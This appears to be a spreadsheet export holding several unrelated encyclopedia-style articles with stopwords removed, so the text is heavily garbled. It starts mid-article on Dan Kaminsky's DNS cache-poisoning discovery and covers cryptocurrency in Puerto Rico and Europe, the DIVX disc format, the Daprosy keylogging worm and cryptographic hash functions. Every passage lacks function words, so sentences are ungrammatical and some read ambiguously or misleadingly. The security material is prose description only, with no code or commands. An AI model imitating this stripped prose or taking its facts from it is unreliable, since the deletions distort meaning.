linking non-existent subdomains targeted websites. kaminsky demonstrated process setting rickrolls facebook paypal. while vulnerability used initially depended part fact earthlink using barefruit provide advertising, kaminsky able generalize vulnerability attack verizon attacking provider, paxfire.kaminsky went public working networks question eliminate immediate cross-site scripting vulnerability. flaw 2008, kaminsky discovered fundamental flaw domain name system (dns) protocol could allow attackers easily perform cache poisoning attacks nameservers (djbdns, powerdns, maradns, secure64 unbound vulnerable). with internet-based applications depending locate peers, wide range attacks became feasible, including website impersonation, email interception, authentication bypass "forgot password" feature many popular websites. after discovering problem, kaminsky initially contacted paul vixie, described severity issue meaning "everything digital universe going patched." kaminsky alerted department homeland security executives cisco microsoft work fix.kaminsky worked vendors secret develop patch make exploiting vulnerability difficult, releasing july 2008. date, design flaw vulnerability fully fixed.kaminsky intended publicize details attack days release patch, details leaked july 2008. information quickly pulled down, mirrored others. later presented findings black briefings, wore suit rollerskates.kaminsky received substantial amount mainstream press disclosing vulnerability, experienced backlash computer security community immediately disclosing attack. when reporter asked used flaw financial benefit, kaminsky responded felt would morally wrong, wish mother visit prison.the actual vulnerability related 65,536 possible transaction ids, number small enough simply guess given enough opportunities. bernstein, author djbdns, reported early 1999. djbdns dealt issue using source port randomization, port used second transaction identifier, thus raising possible count billions. other popular name server implementations left issue unresolved concerns performance stability, many operating system kernels simply designed cycle thousands network sockets second. instead, implementers assumed dns's time live (ttl) field would limit guesser attempts day.kaminsky's attack bypassed defense targeting "sibling" names like "83.example.com" instead "www.example.com" directly. because name unique, entry cache, thus ttl. name sibling, transaction-id guessing spoofed response could include information itself, target well. using many "sibling" names row, could induce server make many requests once. this tactic provided enough opportunities guess transaction successfully spoof reply reasonable amount time.to issue, major servers implemented source port randomization, djbdns powerdns done before. this makes attack 65,536 times harder. attacker willing send billions packets still corrupt names. dnssec proposed bring cryptographic assurance results provided dns, kaminsky spoken favor automated detection conficker march 2009, kaminsky discovered conficker-infected hosts detectable signature scanned remotely. signature updates number network scanning applications available, including nmap nessus. flaws internet x.509 infrastructure 2009, cooperation meredith patterson sassaman, kaminsky discovered numerous flaws protocol. these include weak hash function verisign root certificates errors certificate parsers number browsers allow attackers successfully request certificates sites control. attack "zero 0wned" july 2009, kaminsky, along several high-profile security consultants, experienced publication personal email server data hackers associated "zero 0wned" online magazine. attack appeared designed coincide kaminsky's appearance black briefings. interpolique june 2010, kaminsky released interpolique, beta framework addressing injection attacks injection cross-site scripting manner comfortable developers. personal life death york times wrote community known biting, sometimes misogynistic discourse twitter, kaminsky stood empathy." known regularly paying hotels travel bills people going black hat, paid plane ticket friend broken boyfriend; pair later married. various points career, kaminsky shifted focus work projects related friends' family's health, developing helps colorblind people, working hearing technology, developing telemedicine tools related aids among refugees academic model providing access healthcare (ampath). according mother, things right thing would elicit financial gain."kaminsky also outspoken privacy rights advocate. during fbi–apple encryption dispute, criticized comments then-fbi director james comey, saying "what policy united states right now? make things secure make less secure?" 2016 interview, kaminsky said, "the internet never designed secure. internet designed move pictures cats didn’t think you’d moving trillions dollars onto this. what going here’s answer: some it."kaminsky died april 2021 diabetic ketoacidosis home francisco. frequently hospitalized disease prior years. after death, received tributes electronic frontier foundation, called "friend freedom embodiment true hacker spirit", jeff moss, said kaminsky internet hall fame. 2021, wish came fruition. works russell, ryan (2000). hack proofing network internet tradecraft ed.). rockland, syngress. isbn 1-928994-15-6. references external links kaminsky twitter kaminsky, dan. "welcome". doxpara research. archived original january 2000. davis, joshua (november 2008). "secret geek a-team hacks back, defends worldwide web". wired. issn 1059-1028. retrieved 2021. kaminsky; scott rose; cricket liu; (june 2009) dnssec: what means security your network white security company, kaminsky founder</t>
  </si>
  <si>
    <t>Cryptocurrencies in Puerto Rico</t>
  </si>
  <si>
    <t>with arrival several figures brock pierce following passing hurricane maria 2017, cryptocurrency became issue mediatic socioeconomic interest caribbean archipelago puerto rico. these traders relocated island motivated incentives provided 20-2012 22-2012 (both part 60–2019) tropical setting. they claimed intention create utopian blockchain "crypto city" "community", various times became known names puertopia, crypto rico, puerto crypto sol, becoming known "puertopians". ideas promoted group prompted mixed reception, favored gubernatorial administrations also spawning protests political grassroots movements raise concerns disaster capitalism, gentrification settler colonialism. puerto rico earned reputation cryptocurrency enthusiasts and, according pierce, 2021 archipelago largest quantity coins concentrated single place world. history background semi-autonomous territory "belongs part united states, puerto rico regarded foreign jurisdiction purposes. however, despite foreign account compliance (facta), apply. 2012, promotion export services (more commonly known "act 20") promote relocation individual investors puerto rico (a.k.a. "act 22"), facilitated export services offered significant exemptions wealthy individuals willing relocate puerto rico respectively, passed intention attracting venture funding. most businessmen arrived since focused acquisition real estate forms economic development. 2019, legislative assembly puerto rico approved integrated preexisting laws incentives code.roosevelt roads naval station closed 2004, united states navy ousted vieques, puerto rico following wave civilian protests. since then, number initiatives proposed, redevelopment zone stalled specific facilities repurposed. among projects made past planning stage caribbean riviera mega-project luis fortuño, involvement clark realty capital housing/commercial projects alejandro garcía padilla large scale amusement park ricardo rosselló. others, filming productions like wrecked crossbones marine environmental remediation group's boat recycling facility either temporary short-lived. current form, cryptocurrency introduced response financial crisis 2007–2008 anonymous figure satoshi nakamoto considered popularizer. bitcoin, created 2009, first decentralized cryptocurrency. since then, numerous others created. increase value cryptocurrencies made several traders wealthy, oscillating millionaires billionaires. influx crypto traders, puertopia michael terpin, founder bitangels, claims first crypto investor relocate 2016 active promoting settlement foreigners part practice doesn’t consider "colonization". september 2017, hurricane maria passed puerto rico, creating considered worst natural disaster record archipelago. only months later, group cryptocurrency figures bitcoin foundation chairman brock pierce relocated juan, gathering hotels purchasing colonial building previously housed children's museum. first reference migration media happened january 2018, jeremy gardner said "they're going build modern-day atlantis there". arrivals numbered dozens mostly composed executives firms (ethereum blockchain-as-a-service entrepreneur andrew keys), early adopters, nouveau riche benefitted early adoption bitcoin value rising 2017, traders investors, among enthusiasts. according york times article quoted pierce, economic environment followed convinced choose ravaged archipelago. words fifth avenue capital's stephen morris, "it's everything's swept away make case rebuilding ground up". group unveiled plans build puertopia sol, city transactions made digital currency contracts codified underlying technology blockchain. located derelict remains roosevelt roads naval base ceiba, puerto rico, project would include first cryptocurrency-exclusive bank world showcase group promote vision "what crypto future could look like". group claimed would investing local economy, particular widespread reconstruction efforts following hurricane. puertopians part larger group clients fueled creation local businesses dealing legal advice incoming super rich. number foreign-owned banking institutions created puerto rico, including bank, mercantile bank international (sjmx, formerly juan merchantile exchange) iteration historical medici bank, welcomed transactions cryptocurrency. bitcoin atms hosted bitstop athena began installed, robots inc. granted patent similar device. pattern decline value digital coins 2018 directly resulted dissolution juan-based noble bank. puertopians began lose money, left puerto rico, others adopted defensive measures possibility prolonged market crash, known "crypto winter", forthcoming. traders lost money initiatives involving local non-profits abandoned, mainly directed towards aiding communities remained affected hurricane. goal build crypto city remains unfulfilled, recent initiatives roosevelt roads focusing restoring airport establishing spaceport. pierce, purchased colonial building catholic church 2020, claimed "these loose ideas, nothing concrete well thought out". puertopians broadened presence archipelago, retaining home base juan acquiring properties dorado, humacao, rincón island municipality vieques.during summer 2020, puerto rican software mogul orlando bravo became interested bitcoin vacationing dorado, purchasing undisclosed amount publicly speaking favor. 2021, influx increased again, relocation cryptocurrency hedge funds pantera redwood city ventures well mining operations coinmint. among frances haugen, earned notoriety exposing inner workings facebook purchased enough cryptocurrency right time". time, retired baseball player alfredo escalera publicly lobbied public policy, stating "our governors educate development technology, mining coins programming "blockchains" attract thousands investors engage business worldwide." shortly moving dorado, influencer logan paul became involved cryptocurrency named dink doink, labelled "scam" nasdaq. crypto personality amanda cassatt husband samuel relocated, individuals arrived different states. however, wave also brought individuals receive exemptions also became involved community, keiko yoshino puerto rico blockchain trade association.aware perception group became increasing contentious property prices juan increased, puertopians began rebrand efforts "more inclusive, empowering communal", individual-owned linked advent web3. such, weekly events known cryptocurious crypto mondays organized general public targets. local crypto entrepreneurs juan carlos pedreira began capitalize. according dedc, least individuals classified "crypto entrepreneurs" arrived puerto rico 2021, potentially involved industry. among local corporations, díaz fontanez group first salary employees digital currency, citing move response growing inflation international markets.the 2022 puerto rico digital trends study published sales marketing executives association (cme) placed overall awareness cryptocurrencies 67.7%, 40.6% "does understand" work another 30.5% "does consider trustworthy", another 14.5% considering "the money future". horpr hearings regulation january 2022, speaker tatito hernández popular democratic party (ppd), argued favor employing blockchain tasks fighting public corruption, revealed house representatives puerto rico investigating topic creating regulatory frame cryptocurrency. house resolution passed expressed intent studying “the concept blockchain government filing system, well digital coins (cryptocurrency) accepted form payment puerto rico”. jesús manuel ortiz ppd, chair horpr’s government comission publicly endorsed cryptocurrencies “scaffold worldwide economy near future”, responsible investigation. according february 2022 report, puerto rico department treasury established acquisition property real estate using cryptocurrencies become widespread puerto rico. involved hearings acknowledged transactions become pervasive.in representation prdt, ángel pantoja recommend following internal revenue service (irs) guidelines topic, given political status puerto rico lack precedent. natalia zequeira, financial institutions commissioner, emphasized volatility cryptocurrencies convinced banks adopt “conservative positions” listing perceived positives negatives, concluded regulatory framework place “puerto rico cannot fall behind. future markets, transactions digital currency. imperative forefront technology”. speaking puerto rico bankers association, zoimé álvarez argued order comply federal deposit insurance corporation standards regulatory controls required prevent illegal activity “money laundering [or] terrorism financing”. afterwards, ortiz made clear satisfied anticipated bill presented regulate cryptocurrencies jurisdiction. reception government politics puerto rico department treasury declined comment issue, recognizing expert cryptocurrency moment, noted future interest one. puerto rico office commissioner financial institutions seen sufficient legitimacy approve existence "digital internacional bank" licenses, interpretation international banking laws. however, unlike locations banks suppressed cryptocurrency, puerto rico bankers association notes president zoimé álvarez consider "enemies" "[cryptocurrency] stay, concerned irreversible nature payments. when first interviewed topic, governor ricardo rosselló conservative partido nuevo progresista (pnp) expressed "there still work done giving clarity used money laundering it’s used areas", favored widely adopting blockchain "game changer". despite charge conference (named "puerto crypto") relevant legislation addressed, manuel laboy rivera secretary economic development commerce puerto rico (dedc), expressed lack knowledge real reach bitcoin within puerto rican economy (despite recorded since early 2010s) speculated changes local financial regulations needed. when prodded would involve, states would revolve around fraud protection. corporative lawyer antonio bauzá agreed argued favor audits. 2021, carlos fontan director invcentives program dedc reaffirmed government's assessment puertopians creating jobs.by time left office among public protests related telegramgate, rosselló regarded "supportive crypto-entrepreneurial efforts among final appointments sjmx founder james robert 'bo' collins board invest puerto rico. wanda vázquez garced, held office years, increased yearly paid beneficiaries $300 $5,000. elected 2020, governor pedro pierluisi, publicly supported incentives since days resident commissioner puerto rico, resumed favorable public policy hosted dinner pierce cryptocurrency-friendly york mayor eric adams. 2019, legal ramifications topic discussed university puerto rico school law's revista jurídica, verónica otero rivera concluded acts designed types business legislation needed model used digital coins. 2021, ocif commissioner natalia zequeira defended lack formal regulation responded aversion "innovation" entities fdic. liberal factions including puerto rican independence party (pip) movimiento victoria ciudadana (mvc) opposed settlement puerto rico beneficiaries believing promotes displacement, maría lourdes santiago presenting bill repel benefits. former gubernatorial candidate defunct working people's party, rafael bernabe riefkohl, linked influx foreigners economic policies united states imposed following spanish-american war, decimated sugar industry puerto rico, subsequent implementation operation bootstrap relationship previous migrations. media largest newspaper puerto rico, nuevo día, covering cryptocurrency topics since 2014, articles ranging bitcoin adoption local regulation establishment medici bank. most articles informative opposed investigative, exceptions including piece sharon minelli pérez created profile "crypto enthusiasts" become involved since "crypto boom" 2017. christian gabriel ramos segarra authored several articles topic vocero 2021, initially discussing lack formal regulation how, conjunction price fluctuations btc, slowed widespread adoption among general populace puerto rico, citing point bulk involved still influx foreign traders. another piece, echoed arguments several traders including pierce potential cryptocurrency economic development puerto rico properly regulated. when price bitcoin improved 2021, aiola virella metro puerto rico interviewed juan carlos pedreira concept coin displacing traditional currency within markets inflation increased.when puertopians first made presence known 2018, rafael lenín lópez wapa-tv began investigation noticentro, channel's news service. interviewed number government officials, technological experts economists, whose reactions varied cautious support skepticism. lloréns vélez caribbean business wrote regulation would required puerto rico could become crypto-paradise", citing figures discussed legal banking aspects idea. this publication also gave general coverage local topics related cryptocurrency including regulation, proposal digital coin known "kokicoin", relationship noble bank tether conferences including coinagenda. digital newspaper noticel published several pieces cryptocurrency, staff adopting differing views subject following initial report arrival puertopians incentives. eric león soto written informative pieces crypto banking proposal create investment fund promoted pierce. however, adriana jesús salamán critical group, noting suspicions surrounding writing acquisition properties juan arrival special economic zones, labelled "another experiment puerto rico crypto-community". 2022, jeremy ortiz portalatín telemundo puerto rico's (wkaq-tv) newsservice published investigative series interviewed traders politicians within context ongoing inflation united states dollar, discussing puertopians, regulation metaverse.abroad, journalists like larisa yarovaya brian lucey conversation expressed concerns creation would result crypto-colonialism. mariah espada time focused coverage activists opposed beneficiaries including "crypto currency tycoons" perception fuels displacement gentrification. neil strauss rolling stone opted publish biographical article pierce documented day-to-day life intended turn puerto rico burning utopia", discussing number personal quirks prompt comparisons cult leaders hippies, establishing position facto leader puertopians. chloe watlington baffler, disregarded puertopians’ proposal build techno-utopia "battery garbled catchphrases slogans masquerading business plans" linked "old colonial scams puerto rico". mark elwood york post wrote positively administration's approach calls "puerto crypto movement", comparing singapore arguing going "reshape puerto rico america’s homegrown answer dubai". samantha critical arrival traders puerto rico, calling group "tax locusts" hosting manuel natal segment full frontal samantha titled "tax locusts blockchain bros". canadian author naomi klein shares similar opinion battle paradise: puerto rico takes disaster capitalists, asserting "the true religion avoidance". writing british newspaper times, josh glancy described group idealistic, "self-assured utopian" sillicon valley tycoons, presenting generally favorable light emerging "technological network". other demographics upon arrival general populace concept well understood often compared iraqi dinar investment scam. contrast, idea cryptocurrency favored young puerto ricans interested technology, entrepreneurs involved creative industries. 2018 businesses began accepting bitcoin form payment, individuals involved services touristic taxis uber drivers. first health care institution accept cryptocurrency form payment puerto rico profesional hospital guaynabo located eponymous municipality. media attention topic resulted better awareness following years, reaching blue collar workers. increase adoption also cryptocurrency used criminals began requesting scam payments bitcoin. parallel this, grassroots movements oppose gentrification began publicly oppose arrival puertopians along beneficiaries organization known #abolishact60, considers acquisition real state traders "predatory" practice takes place conjunction ongoing migration puerto ricans florida locations. first instance took place october 2018, young woman confronted pierce hosting event named #restartweek. local feminist group taller salud protested believes "tax havens inaccessible incentives natives strengthened upheld colonialism." this animosity extended puerto ricans cooperated group, referred "vendepatrias" (traitors) involvement. amid pattern foreigners acquiring increasingly expensive buildings juan, posters depicting puertopians particular pierce) caption “this colonizers look like" began appearing throughout colonial city along beneficiaries among members stateside puerto ricans, artists liat berdugo emily martinez, collectively known anxious make, created exhibit known "eternal playground" documented reactions people opposed arrival first wave cryptocurrency traders disaster capitalism. others like diáspora resistencia actively trying point attention congress towards issue, scrutinize beneficiaries pressure local government action. references footnotes</t>
  </si>
  <si>
    <t>Cryptocurrencies in Europe</t>
  </si>
  <si>
    <t>general notion cryptocurrencies europe denotes processes legislative regulation, distribution, circulation storage cryptocurrencies europe. there still unified regulatory framework regarding cryptocurrencies european union. however, various authorities within given number legal initiatives creating consensus issues cryptocurrency distribution. legality cryptocurrencies europe there regulatory policy recommendations states follow course cryptocurrency adoption regulatory framework development given chronological order. 2013, european banking authority (eba) issued public warning possible risks virtual currencies.in 2014, issued decision virtual currencies, included list risks associated dissemination.in 2016, european central bank issued analysis virtual currency schemes, acknowledging potential advantages virtual currencies.the european securities markets authority (esma) published study 2017 distributed ledger technology (dlt) securities markets.also year, esma released statements initial coin offerings (icos), investor risks laws apply companies participate offers. after that, european commission directed esma evaluate applicability appropriateness existing financial services regulatory framework crypto assets.in 2018, european parliament released reports virtual currencies central banks’ monetary policy.in 2018, financial stability board (fsb) released study crypto asset market potential pathways future financial stability concerns.during meeting july 2019 risks posed global stablecoin projects discussed.finma, swiss financial authority, published supplement guidelines outlining treats so-called ‘stable coins’ swiss supervisory law.in 2019, highlighted paper series discussion stability crypto-assets.in september 2020, european commission today adopted digital finance package, including digital finance retail payments strategies, legislative proposals crypto-assets digital resilience.in 2020, released report stablecoins’ regulatory status.in 2020, european commission proposed pilot regime market infrastructures wish trade settle transactions financial instruments crypto-asset form.in july 2021, european central bank launching pilot project "digital euro". also, officially launched 2-year-long study creation digital euro various nuances would involve.in july 2021, european commission released statement would apply known travel rule crypto transactions make traceable.in september 2021, european securities markets authority published report trends, risks vulnerabilities crypto assets considered high-risked innovational financial technology. cryptocurrency market according chainalysis, europe's growth largely driven so-called "whales", large institutional investors shifting enormous sums cryptocurrency.according chainalysis, europe world's largest crypto economy, collecting trillion previous year, crypto activity worldwide.different countries approach cryptocurrencies legalization, distribution, storage. germany germany continues implementing crypto national regulation. first, started licensing crypto custody service providers defining crypto assets financial instruments. private funds allowed keep investments crypto.in august 2020, ministry finance ministry justice germany promulgated bill regulate electronic securities country (ewpg-e). united kingdom although united kingdom affirmed 2020 crypto assets property, cryptocurrency regulations consider cryptocurrencies legal tender.mining cryptocurrencies permitted.in march 2022, financial conduct authority (fca) declared cryptocurrency atms country illegal would need shut down. none atm's operators successfully registered agency. cited failure comply know customer laws (kyc), track prevent money laundering, well high risk customers, lack regulation protection. time, coin radar listed atms country. ukraine september 2021, parliament ukraine passed legalize cryptocurrency. divided virtual currencies secured unsecured assets establishes obligation crypto service providers comply anti-money laundering laws. netherlands july 2020, dutch central bank (dnb) said euro system's central bank digital currency (cbdc) programmable bitcoin. estonia estonia published bill early 2018. according organization economic cooperation development (oecd), estonia's policy competitive world. there income jurisdiction, therefore funds received icos subject bitcoin altcoins subject vat. france government policy appears supportive crypto, would possible regulate. march 2020, central bank france began study topic cbdc, sold securities digital euro, september 2020, france announced launch cbdc based tezos blockchain. spain spain, specific virtual currencies' legislation, except approved july 2021 preventing fighting evasion. public opinion issued report findings three-month study residents digital euro april 2021: only residents ready utilize digital euro, prefer cash payments, prefer mixed method, prefer hybrid strategy. references</t>
  </si>
  <si>
    <t>DIVX</t>
  </si>
  <si>
    <t>divx (digital video express) discontinued digital video format, unsuccessful attempt create alternative video rental united states. format divx rental format variation player customer would divx disc (similar dvd) approximately us$4.50, watchable hours initial viewing. after period, disc could viewed paying continuation play days. viewers wanted watch disc unlimited number times could convert disc "divx silver" disc additional fee. "divx gold" discs could played unlimited number times divx player announced time divx's introduction, divx gold titles ever released. each divx disc marked unique barcode burst cutting area could read player, used track discs. status discs monitored account phone line. divx player owners account divx additional viewing fees could charged. player would call account server phone line charge viewing fees similar directv dish network satellite systems handle pay-per-view. addition normal content scramble system (css) encryption, divx discs used triple encryption alternative channel modulation coding scheme, prevented read standard players. most discs would manufactured united kingdom-based nimbus international.divx players manufactured zenith electronics (who would bankrupt shortly launch format), thomson consumer electronics (rca proscan), matsushita electric (panasonic) started become available mid-1998. these players differed regular players addition security chip (powered risc manufactured vlsi) controlled encode/decode digital content. mail systems included players well. because widespread studio support, manufacturers anticipated demand units would high. initially, players approximately twice expensive standard players, price reductions occurred within months release. history development launch divx introduced september 1997 (after previously made code name zoom tv), format development since 1995. format partnership circuit city entertainment firm ziffren, brittenham, branca fischer, former company investing $100 million latter firm. advertiser attempted sign company, unable spurred lawsuit two.the product made quiet showing consumer electronics show vegas early january 1998, attention 20th century february 1998 signed deal release titles format. after multiple delays, initial trial divx format francisco, california richmond, virginia areas starting june 1998. initially, single zenith player available starting $499, along (but titles. very players sold time period, good guys chain alleging fewer players sold time period. nationwide rollout began three months later, september zenith player titles available stores western u.s.at format's launch, divx sold primarily circuit city, good guys, ultimate electronics retailers. format promoted consumers alternative traditional video rental schemes promise returns, late fees." though consumers could discard divx disc initial viewing period, several divx retailers maintained divx recycling bins premises. september 1998, fourth retailer, canadian future shop, signed contract divx stock format, although stores u.s. only. thomson's player, multiple delays, arrived october 1998, followed panasonic's december format made overall national debut october 1998. marketing push began november 1998 holiday season, million going campaign. fortunes format would seemingly turn better mid-december 1998, shortage players occurred. total, 87,000 players sold final quarter 1998, 535,000 discs across titles sold, although fewer 17,000 accounts divx created. opposition almost immediately format's reveal, movement internet initiated divx, particularly home theater forums existing owners then-still nascent format. broader groups consumers environmental concerns format, since advertised returns" model disc would discarded waste initial user done rather reused traditional rental model. both companies created format (sony toshiba) also denounced divx, major studio distributor warner home video (who first major american studio distribute dvd) forum consortium developers format standardized dvds). titles divx catalog released primarily scan format limited special features, usually trailer (although widescreen titles arrive format early december 1998). this caused many home theater enthusiasts become concerned success divx would significantly diminish release films format films' original aspect ratios supplementary material. some early demos also noted unique instances artifacting discs present standard dvds. many people various technology entertainment communities afraid would divx exclusive releases, then-fledgling format would suffer result. dreamworks, 20th century fox, paramount pictures, instance, initially released films exclusively divx format (something divx originally intend happen), disney, released formats. divx featured stronger encryption technology (triple instead css) many studios stated contributing factor decision support divx. others cited higher price divx-compatible players rental costs reason opposing format, declaring divx "holding hostage". online poll surveyed people format, nearly disapproved format's concept, another poll december 1998 reflected disapproval even format free testament fierce online backlash format received. early december 1997, news outlets already calling format failure circuit city.in addition hostile internet response, competitors hollywood video advertisements touting benefits "open dvd" divx, angeles times depicting hand holding telephone line caption: "don't anyone feed line." terminology "open dvd" used supporters later sony themselves; response divx's labeling "basic dvd" divx/dvd players "divx-enhanced". other retailers, best buy, also concerns, citing possible customer confusion cumbersomeness formats. pay-per-view companies also concerned format intruding business sector, namely objective single-use rentals film offered consumer.however, early concerns alleged feared constant usage phone line proved somewhat exaggerated, players needed verify usage twice month. despite this, informational-freedom advocates concerned players' "dial-home" ability could used people's watching habits, well copyright privacy concerns licensing media, alleging violated fair-use laws entirely.allegations anti-competitive vaporware, well concerns within software industry prompted david dranove northwestern university neil gandal aviv university university california, berkeley, conduct empirical study designed measure effect divx announcement market. this study suggests divx announcement slowed adoption technology. according dranove gandal, study suggests "general antitrust concern vaporware seems justified". demise right launch format, circuit city announced despite gain 4.1% profit, huge expenses launching format (among issues) massively undercut profit. early september 1998, circuit city looking partners share losses format's launch. retailers blockbuster video carry format all. helping format's defenders suspicious activity pro-divx sites, shutting quickly opened.divx thomson teamed january 1999 create another format made high-definition video using existing technology, predating development blu-ray many years. market share divx players january 1999, march, around titles available divx format. however, sales format quickly fell 1998 holiday season, three third-party retailers pulling divx sales point. may, studio support divx would start phased paramount refusing convert titles "silver" discs (and later stopping divx releases entirely), disney increasing activity. format's first anniversary, future format grim five divx-compatible players (and divx-compatible computer drives), titles, circuit city selling divx discs.the format discontinued june 1999, costs introducing format, well limited acceptance general public retailers. format's life, circuit city announced $114 million after-tax loss, variety estimated total loss scheme around $337 million. over next years, divx system phased out. customers could still view divx discs given $100 refund every player purchased june 1999. discs unsold summer 1999 destroyed. program officially access accounts july 2001. player's security module, internal real-time clock, ceased allow divx functions days without connection central system. unsold players liquidated online auctions, modified remove divx security module. result, certain player models demonstrated lockups divx menus accessed. company website announce discontinuation product june 1999, stated: "all divx-featured players fully functional players continue operate such. divx discs, including previously purchased consumers remaining retailer inventories, viewed registered players anytime june 2001. subsequent viewings also available period. discs longer upgraded unlimited viewing, known divx silver. customers converted discs divx silver continue viewing discs june 2001, receive full refund conversion price request". this meant divx discs could play content june 2001, rendering medium worthless. divx appeared "dishonorable mention" alongside world's list worst tech products time" 2006. list films available divx also planned obsolescence digital rights management flexplay (another disposable format) dvd-d (another disposable format) references external links divx owners association, archived april 2008. official website, archived 1999.</t>
  </si>
  <si>
    <t>Daprosy Worm</t>
  </si>
  <si>
    <t>daprosy worm malicious computer program spreads local area network (lan) connections, spammed e-mails mass storage devices. infection comes single read1st.exe file several dozen clones created bearing names compromised folders. obvious symptom daprosy infection presence classified.exe open secrets!.exe files infected folders. although first observed early 2009, worm first announced public daprosy trojan worm symantec july 2009 later identified autorun-ams, autorun-amw autorun-apl sophos. acquired additional aliases antivirus companies others incarnation variation autorun.h.the worm belongs “slow” mass mailer category copies attached sent addresses intercepted keyboard. e-mail consists promotion installation instruction imaginary antivirus product purported remove unknown infections computer. while infection cannot occur attached worm renamed opened, could spread system folders matter seconds. known shut hang windows vista windows attempts write system drive denied said operating systems. also, worm hides folders makes "super hidden" data contained easily accessed. precision logging main threat associated daprosy infection. logged keystrokes containing sensitive data could sent author using worm's improvised mailing system. early strains known destabilize, corrupt even stall operating system programming bugs. said strains appear incomplete probably created students amateur visual basic programmers evidenced using decompilers. final later releases daprosy worm prolific online game password stealers. they also pose great threats banking e-commerce establishments. daprosy worm rampant public internet cafés connections exposed mass storage drives. october 2009 special scripts available remove infected computers. many windows system stalled last november 2009. initial investigation points older versions daprosy worm, viz. sophos autorun-ams autorun-amw, appear "friday thirteenth" malware. more recent persistent variants daprosy worm still circulation. notable variant, win32/kashu.b identified ahnlab, removed using live usually, variants daprosy worm infected sality viruses usually file size greater kilobytes. appears daprosy worm natural host file-infecting viruses since former well distributed drives. viral daprosy exists many variants requires special scripts remove. manual removal worms infected viruses requires knowledge usually belonging individuals associated companies. daprosy "active" even safe mode makes difficult manually remove. logging mechanism precise captures almost everything typed keyboard. this ranks daprosy dangerous worms last decade. references</t>
  </si>
  <si>
    <t>Cryptographic hash function</t>
  </si>
  <si>
    <t>cryptographic hash function (chf) mathematical algorithm maps data arbitrary size (often called "message") array fixed size (the "hash value", "hash", "message digest"). one-way function, function practically infeasible invert reverse computation. ideally, find message produces given hash attempt brute-force search possible inputs produce match, rainbow table matched hashes. cryptographic hash functions basic tool modern cryptography. cryptographic hash function must deterministic, meaning message always results hash. ideally also following properties: quick compute hash value given message infeasible generate message yields given hash value (i.e. reverse process generated given hash value) infeasible find different messages hash value small change message change hash value extensively hash value appears uncorrelated hash value (avalanche effect)cryptographic hash functions many information-security applications, notably digital signatures, message authentication codes (macs), forms authentication. they also used ordinary hash functions, index data hash tables, fingerprinting, detect duplicate data uniquely identify files, checksums detect accidental data corruption. indeed, information-security contexts, cryptographic hash values sometimes called (digital) fingerprints, checksums, hash values, even though terms stand general functions rather different properties purposes. properties most cryptographic hash functions designed take string length input produce fixed-length hash value. cryptographic hash function must able withstand known types cryptanalytic attack. theoretical cryptography, security level cryptographic hash function defined using following properties: pre-image resistance given hash value difficult find message hash(m). this concept related one-way function. functions lack property vulnerable preimage attacks. second pre-image resistance given input difficult find different input hash(m1) hash(m2). this property sometimes referred weak collision resistance. functions lack property vulnerable second-preimage attacks. collision resistance difficult find different messages hash(m1) hash(m2). such pair called cryptographic hash collision. this property sometimes referred strong collision resistance. requires hash value least twice long required pre-image resistance; otherwise collisions found birthday attack.collision resistance implies second pre-image resistance imply pre-image resistance. weaker assumption always preferred theoretical cryptography, practice, hash-function second pre-image resistant considered insecure therefore recommended real applications. informally, properties mean malicious adversary cannot replace modify input data without changing digest. thus, strings digest, confident identical. second pre-image resistance prevents attacker crafting document hash document attacker cannot control. collision resistance prevents attacker creating distinct documents hash. function meeting criteria still undesirable properties. currently, popular cryptographic hash functions vulnerable length-extension attacks: given hash(m) len(m) choosing suitable attacker calculate hash(m m′), denotes concatenation. this property used break naive authentication schemes based hash functions. hmac construction works around problems. practice, collision resistance insufficient many practical uses. addition collision resistance, impossible adversary find messages substantially similar digests; infer useful information data, given digest. particular, hash function behave much possible like random function (often called random oracle proofs security) still deterministic efficiently computable. this rules functions like swifft function, rigorously proven collision-resistant assuming certain problems ideal lattices computationally difficult, but, linear function, satisfy additional properties.checksum algorithms, crc32 cyclic redundancy checks, designed meet much weaker requirements generally unsuitable cryptographic hash functions. example, used message integrity encryption standard, attack readily discovered, exploited linearity checksum. degree difficulty cryptographic practice, "difficult" generally means "almost certainly beyond reach adversary must prevented breaking system long security system deemed important". meaning term therefore somewhat dependent application since effort malicious agent task usually proportional expected gain. however, since needed effort usually multiplies digest length, even thousand-fold advantage processing power neutralized adding dozen bits latter. messages selected limited messages, example passwords short messages, feasible invert hash trying possible messages set. because cryptographic hash functions typically designed computed quickly, special derivation functions require greater computing resources developed make brute-force attacks difficult. theoretical analyses "difficult" specific mathematical meaning, "not solvable asymptotic polynomial time". such interpretations difficulty important study provably secure cryptographic hash functions usually strong connection practical security. example, exponential-time algorithm sometimes still fast enough make feasible attack. conversely, polynomial-time algorithm (e.g., requires steps n-digit keys) slow practical use. illustration illustration potential cryptographic hash follows: alice poses tough math problem claims solved would like himself, would like sure alice bluffing. therefore, alice writes solution, computes hash, tells hash value (whilst keeping solution secret). then, comes solution days later, alice prove solution earlier revealing hash check matches hash value given before. (this example simple commitment scheme; actual practice, alice often computer programs, secret would something less easily spoofed claimed puzzle solution.) applications verifying integrity messages files important application secure hashes verification message integrity. comparing message digests (hash digests message) calculated before, after, transmission determine whether changes made message file. md5, sha-1, sha-2 hash digests sometimes published websites forums allow verification integrity downloaded files, including files retrieved using file sharing mirroring. this practice establishes chain trust long hashes posted trusted site usually originating site authenticated https. using cryptographic hash chain trust detects malicious changes file. non-cryptographic error-detecting codes cyclic redundancy checks prevent non-malicious alterations file, since intentional spoof readily crafted colliding code value. signature generation verification almost digital signature schemes require cryptographic hash calculated message. this allows signature calculation performed relatively small, statically sized hash digest. message considered authentic signature verification succeeds given signature recalculated hash digest message. message integrity property cryptographic hash used create secure efficient digital signature schemes. password verification password verification commonly relies cryptographic hashes. storing user passwords cleartext result massive security breach password file compromised. reduce danger store hash digest password. authenticate user, password presented user hashed compared stored hash. password reset method required password hashing performed; original passwords cannot recalculated stored hash value. standard cryptographic hash functions designed computed quickly, and, result, possible guessed passwords high rates. common graphics processing units billions possible passwords second. password hash functions perform stretching pbkdf2, scrypt argon2 commonly repeated invocations cryptographic hash increase time (and cases computer memory) required perform brute-force attacks stored password hash digests. password hash requires large random, non-secret salt value stored password hash. salt randomizes output password hash, making impossible adversary store tables passwords precomputed hash values password hash digest compared. output password hash function also used cryptographic key. password hashes therefore also known password-based derivation functions (pbkdfs). proof-of-work proof-of-work system protocol, function) economic measure deter denial-of-service attacks service abuses spam network requiring work service requester, usually meaning processing time computer. feature schemes asymmetry: work must moderately hard (but feasible) requester side easy check service provider. popular system used bitcoin mining hashcash uses partial hash inversions prove work done, unlock mining reward bitcoin, 